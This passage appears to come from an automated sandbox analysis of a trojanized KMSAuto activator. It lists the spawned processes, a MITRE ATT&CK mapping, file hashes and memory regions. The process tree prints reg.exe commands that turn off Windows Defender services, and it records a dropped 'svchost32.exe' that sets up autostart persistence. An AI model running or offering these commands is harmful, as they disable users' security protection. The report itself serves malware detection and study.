                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:980
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:928
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1896
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1976
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1020
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:892
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1284
                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Modifies security service
                                                                                                                                                                                    PID:296
                                                                                                                                                                              • C:\Users\Admin\svchost32.exe
                                                                                                                                                                                "C:\Users\Admin\svchost32.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                PID:1816
                                                                                                                                                                            • C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
                                                                                                                                                                              "C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:1904
                                                                                                                                                                            • C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
                                                                                                                                                                              "C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 KillProcessOnPort -Log -IP
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:896

                                                                                                                                                                            Network

                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                            Persistence

                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                            4
                                                                                                                                                                            T1031

                                                                                                                                                                            New Service

                                                                                                                                                                            1
                                                                                                                                                                            T1050

                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                            2
                                                                                                                                                                            T1060

                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                            New Service

                                                                                                                                                                            1
                                                                                                                                                                            T1050

                                                                                                                                                                            Defense Evasion

                                                                                                                                                                            Modify Registry

                                                                                                                                                                            5
                                                                                                                                                                            T1112

                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                            1
                                                                                                                                                                            T1089

                                                                                                                                                                            Impair Defenses

                                                                                                                                                                            1
                                                                                                                                                                            T1562

                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                            1
                                                                                                                                                                            T1130

                                                                                                                                                                            Discovery

                                                                                                                                                                            System Information Discovery

                                                                                                                                                                            1
                                                                                                                                                                            T1082

                                                                                                                                                                            Impact

                                                                                                                                                                            Service Stop

                                                                                                                                                                            1
                                                                                                                                                                            T1489

                                                                                                                                                                            Replay Monitor

                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                            Downloads

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3EF5.tmp\3F05.tmp\3F16.bat
                                                                                                                                                                              Filesize

                                                                                                                                                                              3KB

                                                                                                                                                                              MD5

                                                                                                                                                                              3a981c51aac5475414f6dea9f4e6ae1a

                                                                                                                                                                              SHA1

                                                                                                                                                                              90fb6d188c3a6a04f9294fabc71f62635f0c3ea6

                                                                                                                                                                              SHA256

                                                                                                                                                                              f6498b247cc03e1599bb19fc49dabb923b675bdfb0fd2348f78861842624f809

                                                                                                                                                                              SHA512

                                                                                                                                                                              a8b49ee8606681f5559d3edddf1708df86f33b9029f140030037d4d2dff40bd288e0c69096be0ead4da4019c0ca5efcf81a33c7405bc82040fe833bb473f0e0b

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\signtool.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              323KB

                                                                                                                                                                              MD5

                                                                                                                                                                              05624e6d27eaef0db0673ae627bd6027

                                                                                                                                                                              SHA1

                                                                                                                                                                              b155c76bf59992a8d75d0e3a59dc94f24aff2591

                                                                                                                                                                              SHA256

                                                                                                                                                                              962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

                                                                                                                                                                              SHA512

                                                                                                                                                                              233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\slmgr.vbs
                                                                                                                                                                              Filesize

                                                                                                                                                                              110KB

                                                                                                                                                                              MD5

                                                                                                                                                                              38482a5013d8ab40df0fb15eae022c57

                                                                                                                                                                              SHA1

                                                                                                                                                                              5a4a7f261307721656c11b5cc097cde1cf791073

                                                                                                                                                                              SHA256

                                                                                                                                                                              ac5c46b97345465a96e9ae1edaff44b191a39bf3d03dc1128090b8ffa92a16f8

                                                                                                                                                                              SHA512

                                                                                                                                                                              29c1348014ac448fb9c1a72bfd0ab16cdd62b628dc64827b02965b96ba851e9265c4426007181d2aa08f8fb7853142cc01fc6e4d89bec8fc25f3d340d3857331

                                                                                                                                                                            • C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              33KB

                                                                                                                                                                              MD5

                                                                                                                                                                              757a99654e7709aa3ef33056fc3dc8eb

                                                                                                                                                                              SHA1

                                                                                                                                                                              d63430b034d1587793dcb5d738b8c3f612546118

                                                                                                                                                                              SHA256

                                                                                                                                                                              ed1aaeb33ea7f8bc4d7fec92dd592eed6192830764e89c3aafa08c075a176817

                                                                                                                                                                              SHA512

                                                                                                                                                                              517cbfd2f07d104ca4a2d38ee320f9bf961f3ea46cf5c3fdee5e6e20cc0e45ef4bf7119580febdd841b835144ae2701eeca8b5398daab8593a4a1b57535e1f04

                                                                                                                                                                            • C:\Users\Admin\KMSAuto_Files\bin\KMSSS.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              33KB

                                                                                                                                                                              MD5

                                                                                                                                                                              757a99654e7709aa3ef33056fc3dc8eb

                                                                                                                                                                              SHA1

                                                                                                                                                                              d63430b034d1587793dcb5d738b8c3f612546118

                                                                                                                                                                              SHA256

                                                                                                                                                                              ed1aaeb33ea7f8bc4d7fec92dd592eed6192830764e89c3aafa08c075a176817

                                                                                                                                                                              SHA512

                                                                                                                                                                              517cbfd2f07d104ca4a2d38ee320f9bf961f3ea46cf5c3fdee5e6e20cc0e45ef4bf7119580febdd841b835144ae2701eeca8b5398daab8593a4a1b57535e1f04

                                                                                                                                                                            • C:\Users\Admin\KMSAuto_Files\bin\KMSSS.log
                                                                                                                                                                              Filesize

                                                                                                                                                                              773B

                                                                                                                                                                              MD5

                                                                                                                                                                              8535c4bbb7167c46ba65262945fe5c28

                                                                                                                                                                              SHA1

                                                                                                                                                                              311e55ffeaae1317c4cd83c9000f65082ae32c2d

                                                                                                                                                                              SHA256

                                                                                                                                                                              fbcbb6f17371066eb9b44303070cc0b1b2100b77195d1c6baebdd15a47691fda

                                                                                                                                                                              SHA512

                                                                                                                                                                              0285b927ad48960ef9581a3216475cdcef7d5df9807f294a247fc8dc75ee02c34ae927ddc02112befed9f22a75b3604b8ce416240b8d1e1f58d5b949b4299034

                                                                                                                                                                            • C:\Users\Admin\kms driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              46KB

                                                                                                                                                                              MD5

                                                                                                                                                                              5f3f77593b1a5bc4e96257a38a8666b1

                                                                                                                                                                              SHA1

                                                                                                                                                                              532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

                                                                                                                                                                              SHA256

                                                                                                                                                                              1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

                                                                                                                                                                              SHA512

                                                                                                                                                                              59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

                                                                                                                                                                            • C:\Users\Admin\kms driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              46KB

                                                                                                                                                                              MD5

                                                                                                                                                                              5f3f77593b1a5bc4e96257a38a8666b1

                                                                                                                                                                              SHA1

                                                                                                                                                                              532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

                                                                                                                                                                              SHA256

                                                                                                                                                                              1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

                                                                                                                                                                              SHA512

                                                                                                                                                                              59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

                                                                                                                                                                            • C:\Users\Admin\kmsauto++v1.6.4.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              17.2MB

                                                                                                                                                                              MD5

                                                                                                                                                                              f047284bfddc942292d93ed86fdb20fd

                                                                                                                                                                              SHA1

                                                                                                                                                                              56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

                                                                                                                                                                              SHA256

                                                                                                                                                                              793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

                                                                                                                                                                              SHA512

                                                                                                                                                                              2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

                                                                                                                                                                            • C:\Users\Admin\kmsauto++v1.6.4.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              17.2MB

                                                                                                                                                                              MD5

                                                                                                                                                                              f047284bfddc942292d93ed86fdb20fd

                                                                                                                                                                              SHA1

                                                                                                                                                                              56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

                                                                                                                                                                              SHA256

                                                                                                                                                                              793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

                                                                                                                                                                              SHA512

                                                                                                                                                                              2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

                                                                                                                                                                            • C:\Users\Admin\microsoft tap driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              59KB

                                                                                                                                                                              MD5

                                                                                                                                                                              e0b6a8a56069214d6dc31a2c053f73f7

                                                                                                                                                                              SHA1

                                                                                                                                                                              3eb13ab2e49014437c904f8ada2d22a85fd503e4

                                                                                                                                                                              SHA256

                                                                                                                                                                              4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

                                                                                                                                                                              SHA512

                                                                                                                                                                              080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

                                                                                                                                                                            • C:\Users\Admin\svchost32.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              533KB

                                                                                                                                                                              MD5

                                                                                                                                                                              4ec113ac1f8e7d4dda1270cc8bb00efc

                                                                                                                                                                              SHA1

                                                                                                                                                                              7a33598cab86959e8a3001ef0a2a756514de3aed

                                                                                                                                                                              SHA256

                                                                                                                                                                              7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

                                                                                                                                                                              SHA512

                                                                                                                                                                              28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

                                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\signtool.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              323KB

                                                                                                                                                                              MD5

                                                                                                                                                                              05624e6d27eaef0db0673ae627bd6027

                                                                                                                                                                              SHA1

                                                                                                                                                                              b155c76bf59992a8d75d0e3a59dc94f24aff2591

                                                                                                                                                                              SHA256

                                                                                                                                                                              962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

                                                                                                                                                                              SHA512

                                                                                                                                                                              233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

                                                                                                                                                                            • \Users\Admin\AppData\Local\Temp\signtool.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              323KB

                                                                                                                                                                              MD5

                                                                                                                                                                              05624e6d27eaef0db0673ae627bd6027

                                                                                                                                                                              SHA1

                                                                                                                                                                              b155c76bf59992a8d75d0e3a59dc94f24aff2591

                                                                                                                                                                              SHA256

                                                                                                                                                                              962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313

                                                                                                                                                                              SHA512

                                                                                                                                                                              233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31

                                                                                                                                                                            • \Users\Admin\kms driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              46KB

                                                                                                                                                                              MD5

                                                                                                                                                                              5f3f77593b1a5bc4e96257a38a8666b1

                                                                                                                                                                              SHA1

                                                                                                                                                                              532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

                                                                                                                                                                              SHA256

                                                                                                                                                                              1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

                                                                                                                                                                              SHA512

                                                                                                                                                                              59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

                                                                                                                                                                            • \Users\Admin\kms driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              46KB

                                                                                                                                                                              MD5

                                                                                                                                                                              5f3f77593b1a5bc4e96257a38a8666b1

                                                                                                                                                                              SHA1

                                                                                                                                                                              532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

                                                                                                                                                                              SHA256

                                                                                                                                                                              1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

                                                                                                                                                                              SHA512

                                                                                                                                                                              59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

                                                                                                                                                                            • \Users\Admin\kms driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              46KB

                                                                                                                                                                              MD5

                                                                                                                                                                              5f3f77593b1a5bc4e96257a38a8666b1

                                                                                                                                                                              SHA1

                                                                                                                                                                              532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

                                                                                                                                                                              SHA256

                                                                                                                                                                              1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

                                                                                                                                                                              SHA512

                                                                                                                                                                              59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

                                                                                                                                                                            • \Users\Admin\kms driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              46KB

                                                                                                                                                                              MD5

                                                                                                                                                                              5f3f77593b1a5bc4e96257a38a8666b1

                                                                                                                                                                              SHA1

                                                                                                                                                                              532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0

                                                                                                                                                                              SHA256

                                                                                                                                                                              1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17

                                                                                                                                                                              SHA512

                                                                                                                                                                              59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200

                                                                                                                                                                            • \Users\Admin\kmsauto++v1.6.4.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              17.2MB

                                                                                                                                                                              MD5

                                                                                                                                                                              f047284bfddc942292d93ed86fdb20fd

                                                                                                                                                                              SHA1

                                                                                                                                                                              56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

                                                                                                                                                                              SHA256

                                                                                                                                                                              793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

                                                                                                                                                                              SHA512

                                                                                                                                                                              2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

                                                                                                                                                                            • \Users\Admin\kmsauto++v1.6.4.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              17.2MB

                                                                                                                                                                              MD5

                                                                                                                                                                              f047284bfddc942292d93ed86fdb20fd

                                                                                                                                                                              SHA1

                                                                                                                                                                              56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

                                                                                                                                                                              SHA256

                                                                                                                                                                              793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

                                                                                                                                                                              SHA512

                                                                                                                                                                              2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

                                                                                                                                                                            • \Users\Admin\kmsauto++v1.6.4.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              17.2MB

                                                                                                                                                                              MD5

                                                                                                                                                                              f047284bfddc942292d93ed86fdb20fd

                                                                                                                                                                              SHA1

                                                                                                                                                                              56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

                                                                                                                                                                              SHA256

                                                                                                                                                                              793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

                                                                                                                                                                              SHA512

                                                                                                                                                                              2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

                                                                                                                                                                            • \Users\Admin\kmsauto++v1.6.4.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              17.2MB

                                                                                                                                                                              MD5

                                                                                                                                                                              f047284bfddc942292d93ed86fdb20fd

                                                                                                                                                                              SHA1

                                                                                                                                                                              56dc945674cf4f941cf17a9ac9c1c9718cf9d18e

                                                                                                                                                                              SHA256

                                                                                                                                                                              793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46

                                                                                                                                                                              SHA512

                                                                                                                                                                              2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513

                                                                                                                                                                            • \Users\Admin\microsoft tap driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              59KB

                                                                                                                                                                              MD5

                                                                                                                                                                              e0b6a8a56069214d6dc31a2c053f73f7

                                                                                                                                                                              SHA1

                                                                                                                                                                              3eb13ab2e49014437c904f8ada2d22a85fd503e4

                                                                                                                                                                              SHA256

                                                                                                                                                                              4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

                                                                                                                                                                              SHA512

                                                                                                                                                                              080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

                                                                                                                                                                            • \Users\Admin\microsoft tap driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              59KB

                                                                                                                                                                              MD5

                                                                                                                                                                              e0b6a8a56069214d6dc31a2c053f73f7

                                                                                                                                                                              SHA1

                                                                                                                                                                              3eb13ab2e49014437c904f8ada2d22a85fd503e4

                                                                                                                                                                              SHA256

                                                                                                                                                                              4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

                                                                                                                                                                              SHA512

                                                                                                                                                                              080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

                                                                                                                                                                            • \Users\Admin\microsoft tap driver.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              59KB

                                                                                                                                                                              MD5

                                                                                                                                                                              e0b6a8a56069214d6dc31a2c053f73f7

                                                                                                                                                                              SHA1

                                                                                                                                                                              3eb13ab2e49014437c904f8ada2d22a85fd503e4

                                                                                                                                                                              SHA256

                                                                                                                                                                              4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9

                                                                                                                                                                              SHA512

                                                                                                                                                                              080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68

                                                                                                                                                                            • \Users\Admin\svchost32.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              533KB

                                                                                                                                                                              MD5

                                                                                                                                                                              4ec113ac1f8e7d4dda1270cc8bb00efc

                                                                                                                                                                              SHA1

                                                                                                                                                                              7a33598cab86959e8a3001ef0a2a756514de3aed

                                                                                                                                                                              SHA256

                                                                                                                                                                              7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

                                                                                                                                                                              SHA512

                                                                                                                                                                              28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

                                                                                                                                                                            • \Users\Admin\svchost32.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              533KB

                                                                                                                                                                              MD5

                                                                                                                                                                              4ec113ac1f8e7d4dda1270cc8bb00efc

                                                                                                                                                                              SHA1

                                                                                                                                                                              7a33598cab86959e8a3001ef0a2a756514de3aed

                                                                                                                                                                              SHA256

                                                                                                                                                                              7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

                                                                                                                                                                              SHA512

                                                                                                                                                                              28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

                                                                                                                                                                            • \Users\Admin\svchost32.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              533KB

                                                                                                                                                                              MD5

                                                                                                                                                                              4ec113ac1f8e7d4dda1270cc8bb00efc

                                                                                                                                                                              SHA1

                                                                                                                                                                              7a33598cab86959e8a3001ef0a2a756514de3aed

                                                                                                                                                                              SHA256

                                                                                                                                                                              7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

                                                                                                                                                                              SHA512

                                                                                                                                                                              28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

                                                                                                                                                                            • \Users\Admin\svchost32.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              533KB

                                                                                                                                                                              MD5

                                                                                                                                                                              4ec113ac1f8e7d4dda1270cc8bb00efc

                                                                                                                                                                              SHA1

                                                                                                                                                                              7a33598cab86959e8a3001ef0a2a756514de3aed

                                                                                                                                                                              SHA256

                                                                                                                                                                              7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

                                                                                                                                                                              SHA512

                                                                                                                                                                              28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

                                                                                                                                                                            • \Users\Admin\svchost32.exe
                                                                                                                                                                              Filesize

                                                                                                                                                                              533KB

                                                                                                                                                                              MD5

                                                                                                                                                                              4ec113ac1f8e7d4dda1270cc8bb00efc

                                                                                                                                                                              SHA1

                                                                                                                                                                              7a33598cab86959e8a3001ef0a2a756514de3aed

                                                                                                                                                                              SHA256

                                                                                                                                                                              7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad

                                                                                                                                                                              SHA512

                                                                                                                                                                              28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2

                                                                                                                                                                            • memory/296-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/316-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/396-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/480-109-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/520-66-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/520-90-0x0000000000400000-0x0000000001713000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              19.1MB

                                                                                                                                                                            • memory/520-132-0x0000000073DC1000-0x0000000073DC3000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              8KB

                                                                                                                                                                            • memory/520-134-0x0000000000400000-0x0000000001713000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              19.1MB

                                                                                                                                                                            • memory/544-111-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/636-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/652-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/776-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/844-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/892-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/896-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/928-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/928-95-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/928-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/956-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/972-112-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/980-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/984-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1000-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1020-99-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1020-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1048-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1144-98-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1156-103-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1156-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1184-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1256-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1276-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1276-110-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1284-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1316-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1380-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1416-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1416-108-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1428-100-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1516-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1516-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1532-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1592-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1596-74-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1596-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1596-93-0x0000000000400000-0x000000000041F000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              124KB

                                                                                                                                                                            • memory/1632-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1636-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1652-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1652-106-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1736-80-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1744-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1760-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1808-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1808-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/1816-91-0x0000000000890000-0x00000000008FD000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              436KB

